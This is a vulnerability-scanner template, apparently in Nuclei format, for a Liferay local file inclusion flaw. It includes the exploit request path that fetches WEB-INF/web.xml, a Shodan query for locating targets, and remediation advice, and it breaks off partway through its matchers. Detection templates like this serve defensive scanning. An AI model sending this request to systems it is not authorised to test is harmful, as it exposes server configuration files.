id: liferay-resource-leak info: name: Liferay - Local File Inclusion author: DhiyaneshDk severity: high description: | Liferay is vulnerable to local file inclusion in the I18n Servlet because it leaks information via sending an HTTP request to /[language]/[resource];.js (also .jsp works). remediation: Update Liferay to the latest version reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 verified: true shodan-query: title:"Liferay" tags: liferay,lfi,j2ee http: - method: GET path: - "{{BaseURL}}/en/WEB-INF/web.xml;.js" matchers-condition: and matchers: - type: word part: body words: - "